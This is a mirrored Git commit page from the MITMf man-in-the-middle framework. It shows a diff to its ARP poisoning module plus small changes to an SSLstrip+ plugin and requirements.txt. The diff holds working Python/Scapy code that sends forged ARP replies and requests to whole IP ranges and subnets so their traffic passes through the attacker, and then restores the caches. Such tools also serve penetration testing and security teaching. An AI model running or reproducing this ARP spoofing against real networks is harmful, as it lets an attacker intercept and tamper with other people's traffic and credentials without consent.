github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-19 21:13:26 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

fixes #117

Browse source
This commit is contained in:
byt3bl33d3r 2015-06-08 13:38:45 +02:00
commit e3aa8ba617
3 changed files with 132 additions and 56 deletions
Download patch file Download diff file Expand all files Collapse all files

182
core/poisoners/arp/ARPpoisoner.py
View file

@ -1,5 +1,8 @@
import logging import logging
import threading import threading
from traceback import print_exc
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from time import sleep from time import sleep
from core.utils import shutdown from core.utils import shutdown
from scapy.all import * from scapy.all import *
@ -10,7 +13,11 @@ class ARPpoisoner():
def __init__(self, gateway, interface, mac, targets): def __init__(self, gateway, interface, mac, targets):
self.gatewayip = gateway try:
self.gatewayip = str(IPAddress(gateway))
except AddrFormatError as e:
shutdown("[ARPpoisoner] Specified an invalid IP address as gateway")
self.gatewaymac = getmacbyip(gateway) self.gatewaymac = getmacbyip(gateway)
self.mymac = mac self.mymac = mac
self.targets = self.getTargetRange(targets) self.targets = self.getTargetRange(targets)
@ -24,21 +31,25 @@ class ARPpoisoner():
if targets is None: if targets is None:
return None return None
targetList = list() try:
targets = targets.split(",") targetList = []
for target in targets:
if "-" in target:
max_range = int(target.split("-")[1])
octets = target.split("-")[0].split(".")
f3_octets = ".".join(octets[0:3])
l_octet = int(octets[3])
for ip in xrange(l_octet, max_range+1): for target in targets.split(','):
targetList.append('{}.{}'.format(f3_octets, ip)) if '/' in target:
else: targetList.append(IPNetwork(target))
targetList.append(target)
return targetList elif '-' in target:
first_half = target.split('-')[0]
second_half = first_half + target.split('-')[1]
targetList.append(IPRange(first_half, second_half))
else:
targetList.append(IPAddress(target))
return targetList
except AddrFormatError as e:
shutdown("[ARPpoisoner] Specified an invalid IP address/range/network as target")
def start(self): def start(self):
if self.gatewaymac is None: if self.gatewaymac is None:
@ -81,22 +92,43 @@ class ARPpoisoner():
elif self.targets: elif self.targets:
#Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it #Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it
for targetip in self.targets: for target in self.targets:
try:
targetmac = getmacbyip(targetip)
if targetmac is None: if type(target) is IPAddress:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) targetip = str(target)
elif targetmac: try:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug) targetmac = getmacbyip(targetip)
sleep(0.3)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e: if targetmac is None:
if "Interrupted system call" not in e: mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass elif targetmac:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
send(ARP(pdst=str(targetip), psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=str(targetip), hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
print_exc()
pass
sleep(self.interval) sleep(self.interval)
@ -108,22 +140,42 @@ class ARPpoisoner():
sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2 sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
elif self.targets: elif self.targets:
for targetip in self.targets:
try:
targetmac = getmacbyip(targetip)
if targetmac is None: for target in self.targets:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac: if type(target) is IPAddress:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug) targetip = str(target)
sleep(0.3) try:
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug) targetmac = getmacbyip(targetip)
except Exception as e: if targetmac is None:
if "Interrupted system call" not in e: mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass elif targetmac:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
send(ARP(pdst=str(targetip), psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=str(targetip), hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
sleep(self.interval) sleep(self.interval)
@ -133,21 +185,43 @@ class ARPpoisoner():
sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2 sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2
def restoreTarget(self, count): def restoreTarget(self, count):
for targetip in self.targets: for target in self.targets:
try:
targetmac = getmacbyip(targetip)
if targetmac is None: if type(target) is IPAddress:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) targetip = str(target)
elif targetmac: try:
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) targetmac = getmacbyip(targetip)
send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug) if targetmac is None:
sleep(0.3) mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e: elif targetmac:
if "Interrupted system call" not in e: mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
send(ARP(op="is-at", pdst=self.gatewayip, psrc=str(targetip), hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
send(ARP(op="is-at", pdst=str(targetip), psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass

1
plugins/SSLstrip+.py
View file

@ -24,6 +24,7 @@ import logging
from plugins.plugin import Plugin from plugins.plugin import Plugin
from core.sslstrip.URLMonitor import URLMonitor from core.sslstrip.URLMonitor import URLMonitor
from core.servers.dns.DNSchef import DNSChef from core.servers.dns.DNSchef import DNSChef
from core.utils import IpTables
class HSTSbypass(Plugin): class HSTSbypass(Plugin):
name = 'SSLstrip+' name = 'SSLstrip+'

1
requirements.txt
View file

@ -1,5 +1,6 @@
Twisted Twisted
requests requests
netaddr
scapy scapy
msgpack-python msgpack-python
dnspython dnspython